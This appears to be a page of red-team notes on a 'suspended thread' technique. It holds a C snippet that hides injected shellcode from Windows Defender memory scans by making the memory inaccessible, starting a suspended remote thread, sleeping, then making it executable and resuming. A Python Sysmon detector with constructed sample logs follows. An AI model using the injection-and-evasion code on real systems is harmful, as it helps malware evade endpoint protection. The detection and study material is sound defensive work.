Pentesting & Red Teaming Notes

Suspended Threads

```c
printf("[+] Changing memory protection, marking it as PAGE_NOACCESS\n");
// Mark the shellcode region as PAGE_NOACCESS (0x01); &protect receives the old protection (lpflOldProtect)
myVirtualProtectEx(hProcess, pRemoteBuffer, SHELLCODE_MEMORY_SIZE, PAGE_NOACCESS, &protect);

// Create the remote thread in the suspended state (C# equivalent shown for reference)
//IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0x00000004, out hThread);

// CREATE_SUSPENDED = 0x00000004
printf("[+] Creating suspended remote thread\n");
hRemoteThread = myCreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteBuffer, NULL, CREATE_SUSPENDED, NULL);

// Sleep 15 seconds while Defender scans the memory (the region is inaccessible during this window)
printf("[+] Sleeping for 15 seconds...\n");

//CronosSleep(15);
Sleep(15000);

// Mark memory as executable again: PAGE_EXECUTE_READWRITE (0x40)
printf("[+] Changing memory protection back, marking it as PAGE_EXECUTE_READWRITE\n");
myVirtualProtectEx(hProcess, pRemoteBuffer, SHELLCODE_MEMORY_SIZE, PAGE_EXECUTE_READWRITE, &protect);

printf("[+] Resuming remote thread\n");
myResumeThread(hRemoteThread);
```
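From the detection side, the observable that survives the sleep-and-flip trick is the remote thread itself: its start address points at a private allocation rather than a loaded module, which Sysmon Event ID 8 (CreateRemoteThread) records as an empty `StartModule`/`StartFunction`. The following is an added example, not code from the page or from the myldr project, that parses Sysmon's text rendering of Event ID 8 and flags cross-process threads whose start address is not module-backed. The field names are Sysmon's own; the three sample records and their values are constructed for the example.

```python
"""Flag Sysmon Event ID 8 (CreateRemoteThread) records whose thread start
address is not backed by a loaded module, the footprint left by a remote
thread started on shellcode in a private allocation."""
from typing import Dict, List

# Constructed sample: three Event ID 8 records in Sysmon's text rendering.
# Sysmon writes "-" for fields it could not resolve, e.g. StartModule when
# the start address lies outside every mapped image in the target process.
SAMPLE_EVENTS = r"""
CreateRemoteThread detected:
RuleName: -
UtcTime: 2024-05-01 10:15:02.123
SourceProcessId: 4242
SourceImage: C:\Users\alice\Downloads\loader.exe
TargetProcessId: 1337
TargetImage: C:\Windows\explorer.exe
NewThreadId: 5555
StartAddress: 0x000001E2A0F40000
StartModule: -
StartFunction: -

CreateRemoteThread detected:
RuleName: -
UtcTime: 2024-05-01 10:16:40.001
SourceProcessId: 900
SourceImage: C:\Windows\System32\csrss.exe
TargetProcessId: 2100
TargetImage: C:\Windows\System32\notepad.exe
NewThreadId: 2140
StartAddress: 0x00007FFB12345678
StartModule: C:\Windows\System32\ntdll.dll
StartFunction: RtlUserThreadStart

CreateRemoteThread detected:
RuleName: -
UtcTime: 2024-05-01 10:20:11.700
SourceProcessId: 6001
SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetProcessId: 3320
TargetImage: C:\Windows\System32\svchost.exe
NewThreadId: 7801
StartAddress: 0x0000021F00C10000
StartModule: -
StartFunction: -
"""


def parse_sysmon_text(text: str) -> List[Dict[str, str]]:
    """Split the text rendering into one dict per record (blank-line separated)."""
    events: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:                      # record boundary
            if current:
                events.append(current)
                current = {}
            continue
        if line.endswith(":"):            # header line such as "CreateRemoteThread detected:"
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        events.append(current)
    return events


def is_unbacked_remote_thread(event: Dict[str, str]) -> bool:
    """True when the thread was created in another process and its start
    address could not be attributed to any loaded module."""
    cross_process = event.get("SourceProcessId") != event.get("TargetProcessId")
    unbacked = event.get("StartModule", "-") in ("-", "")
    return cross_process and unbacked


def find_suspicious(text: str) -> List[Dict[str, str]]:
    """Return the records worth triaging, in log order."""
    return [ev for ev in parse_sysmon_text(text) if is_unbacked_remote_thread(ev)]


if __name__ == "__main__":
    for ev in find_suspicious(SAMPLE_EVENTS):
        print(f"{ev['UtcTime']} {ev['SourceImage']} -> {ev['TargetImage']} "
              f"thread {ev['NewThreadId']} starts at {ev['StartAddress']} (no backing module)")
```

Two caveats a defender should keep in mind: Sysmon does not record the thread creation flags, so the CREATE_SUSPENDED step and the later ResumeThread are invisible to this rule, and it does not log the PAGE_NOACCESS to PAGE_EXECUTE_READWRITE protection change either; those transitions need kernel ETW or EDR telemetry. The rule also fires on legitimate cross-process threads started on non-image memory (JIT runtimes, some installers), so it is a triage signal to join with the source image and parent lineage, not a standalone verdict.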


Last updated 2 years ago

https://www.bordergate.co.uk/windows-defender-memory-scanning-evasion/
https://github.com/morph3/myldr/blob/main/templates/msbuild_aes_encrypt_suspended_thread.csproj
https://github.com/morph3/myldr/blob/main/templates/suspended_thread.c